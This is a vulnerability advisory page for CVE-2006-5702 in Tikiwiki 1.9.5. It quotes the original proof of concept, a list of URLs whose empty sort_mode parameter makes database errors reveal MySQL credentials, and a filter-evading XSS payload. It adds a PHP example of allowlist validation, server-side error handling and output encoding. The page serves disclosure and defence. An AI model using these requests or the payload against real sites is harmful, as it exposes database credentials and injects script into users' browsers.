Tikiwiki Information Disclosure and Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1111450
Vulnerability type: Information disclosure
Published: 2006-11-01
Updated: 2006-11-07
CVE ID: CVE-2006-5702
CNNVD ID: CNNVD-200611-051
Platform: PHP
CVSS score: 5.0
|Source
https://www.exploit-db.com/exploits/2701
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-051
|Details
Tikiwiki allows remote attackers to obtain sensitive information (the MySQL username and password) via an empty sort_mode parameter to (1) tiki-listpages.php, (2) tiki-lastchanges.php, (3) messu-archive.php, (4) messu-mailbox.php, (5) messu-sent.php, (6) tiki-directory_add_site.php, (7) tiki-directory_ranking.php, (8) tiki-directory_search.php, (9) tiki-forums.php, (10) tiki-view_forum.php, (11) tiki-friends.php, (12) tiki-list_blogs.php, (13) tiki-list_faqs.php, (14) tiki-list_trackers.php, (15) tiki-list_users.php, (16) tiki-my_tiki.php, (17) tiki-notepad_list.php, (18) tiki-orphan_pages.php, (19) tiki-shoutbox.php, (20) tiki-usermenu.php and (21) tiki-webmail_contacts.php. The empty value produces a database error, and the resulting error message discloses connection details.
|Exploit
/*==========================================*/
//tikiwiki version 1.9.5 (CVS) -Sirius-  (PoC)
// Product: Tikiwiki 
// URL: http://tikiwiki.org/
// RISK: critical
/*==========================================*/

there's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-
an anonymous user can dump the MySQL user & password just by creating a MySQL error with the "sort_mode" var, with the following links:
/tiki-listpages.php?offset=0&sort_mode=
/tiki-lastchanges.php?days=1&offset=0&sort_mode=
/messu-archive.php?sort_mode=
/messu-mailbox.php?sort_mode=
/messu-sent.php?sort_mode=
/tiki-directory_add_site.php?sort_mode=
/tiki-directory_ranking.php?sort_mode=
/tiki-directory_search.php?sort_mode=
/tiki-forums.php?sort_mode=
/tiki-view_forum.php?forumId=
/tiki-friends.php?sort_mode=
/tiki-list_blogs.php?sort_mode=
/tiki-list_faqs.php?sort_mode=
/tiki-list_trackers.php?sort_mode=
/tiki-list_users.php?sort_mode=
/tiki-my_tiki.php?sort_mode=
/tiki-notepad_list.php?sort_mode=
/tiki-orphan_pages.php?sort_mode=
/tiki-shoutbox.php?sort_mode=
/tiki-usermenu.php?sort_mode=
/tiki-webmail_contacts.php?sort_mode=

a proof of concept is available here: http://cockor.free.fr/PoC.swf

there's also an XSS here:
/tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--

regards, securfrog

# milw0rm.com [2006-11-01]
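The two weaknesses in this record (an unvalidated sort_mode reaching the SQL layer with the database error echoed back, and an unencoded url parameter reflected into an iframe attribute) have the same defensive shape: validate against an allowlist, keep database errors server-side, and encode on output. The PHP below is an added example written for this page, not Tikiwiki's own code or a patch from the project; the table name `tiki_pages`, its column list, the PDO connection and every function name are assumptions chosen for illustration.

```php
<?php
// Added example, not Tikiwiki's code. Table, columns and function names are hypothetical.
declare(strict_types=1);

// --- 1. sort_mode: the listing scripts in this advisory split "<column>_<asc|desc>"
//        and built ORDER BY from it. An empty or unexpected value must never reach SQL.
const ALLOWED_SORT_COLUMNS = ['pageName', 'lastModif', 'hits', 'creator']; // assumed column set
const DEFAULT_SORT_MODE    = 'pageName_asc';

function normalizeSortMode(?string $sortMode): string
{
    // The empty parameter from the advisory (sort_mode=) lands here and gets the default.
    if ($sortMode === null || $sortMode === '') {
        return DEFAULT_SORT_MODE;
    }
    // Shape check first: exactly one word, underscore, then asc or desc.
    if (!preg_match('/^([A-Za-z]+)_(asc|desc)$/', $sortMode, $m)) {
        return DEFAULT_SORT_MODE;
    }
    // Then membership: only columns we know about may be ordered on.
    if (!in_array($m[1], ALLOWED_SORT_COLUMNS, true)) {
        return DEFAULT_SORT_MODE;
    }
    return $m[1] . '_' . $m[2];
}

function sortModeToOrderBy(?string $sortMode): string
{
    [$column, $direction] = explode('_', normalizeSortMode($sortMode), 2);
    // Both parts now come from the allowlist, so they are safe to place in the SQL text;
    // ORDER BY cannot take bound parameters, which is why the allowlist does the work here.
    return sprintf('ORDER BY `%s` %s', $column, strtoupper($direction));
}

function listPages(PDO $pdo, ?string $sortMode, int $offset, int $max): array
{
    $sql = 'SELECT pageName, lastModif, hits, creator FROM tiki_pages '
         . sortModeToOrderBy($sortMode) . ' LIMIT :offset, :max';
    try {
        $stmt = $pdo->prepare($sql);
        $stmt->bindValue(':offset', max(0, $offset), PDO::PARAM_INT);
        $stmt->bindValue(':max', max(1, $max), PDO::PARAM_INT);
        $stmt->execute();
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // The driver message can carry the query text, host and account details:
        // it goes to the server log only, and the caller gets a generic failure.
        error_log('listPages failed: ' . $e->getMessage());
        throw new RuntimeException('Database error', 0);
    }
}

// --- 2. Reflected url parameter (the tiki-featured_link.php case): restrict the scheme,
//        then encode for the HTML attribute context before writing it into the page.
function renderFeaturedFrame(string $url): string
{
    if (!preg_match('#^https?://#i', $url)) {
        $url = 'about:blank'; // drops javascript: and other non-web schemes
    }
    $safe = htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<iframe src="' . $safe . '"></iframe>';
}

// Request handling: never let an exception's message reach the response body.
function handleListRequest(PDO $pdo, array $query): string
{
    try {
        $rows = listPages($pdo, $query['sort_mode'] ?? null,
                          (int)($query['offset'] ?? 0), (int)($query['max'] ?? 20));
        $out = '';
        foreach ($rows as $row) {
            $out .= '<li>' . htmlspecialchars($row['pageName'], ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</li>';
        }
        return '<ul>' . $out . '</ul>';
    } catch (RuntimeException $e) {
        http_response_code(500);
        return '<p>An internal error occurred.</p>';
    }
}

// Offline sanity checks (no database needed for these two helpers):
assert(sortModeToOrderBy('') === 'ORDER BY `pageName` ASC');
assert(sortModeToOrderBy('hits_desc') === 'ORDER BY `hits` DESC');
assert(sortModeToOrderBy('hits_desc; DROP TABLE x') === 'ORDER BY `pageName` ASC');
assert(strpos(renderFeaturedFrame('" ></iframe><script>alert(1)</script>'), '<script') === false);
```

The ordering decision is the important one: because ORDER BY cannot be parameterised, the only sound option is to map the request value onto a fixed set of column names and directions, with every miss (empty, malformed, unknown column) collapsing to the default rather than to an error page. Whether the error page leaks credentials is then a second, independent control: the catch block above logs the driver message and rethrows a message that contains nothing from the driver, so even a future bug in the mapping cannot reproduce this advisory's disclosure.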
|References

BID 20858: http://www.securityfocus.com/bid/20858
BUGTRAQ 20061101 tikiwiki 1.9.5 mysql password disclosure & xss: http://www.securityfocus.com/archive/1/archive/1/450268/100/0/threaded
SECUNIA 22678: http://secunia.com/advisories/22678
XF tikiwiki-password-info-disclosure (29960): http://xforce.iss.net/xforce/xfdb/29960
VUPEN ADV-2006-4316: http://www.frsirt.com/english/advisories/2006/4316
SREASON 1816: http://securityreason.com/securityalert/1816
GENTOO GLSA-200611-11: http://security.gentoo.org/glsa/glsa-200611-11.xml
SECUNIA 23039: http://secunia.com/advisories/23039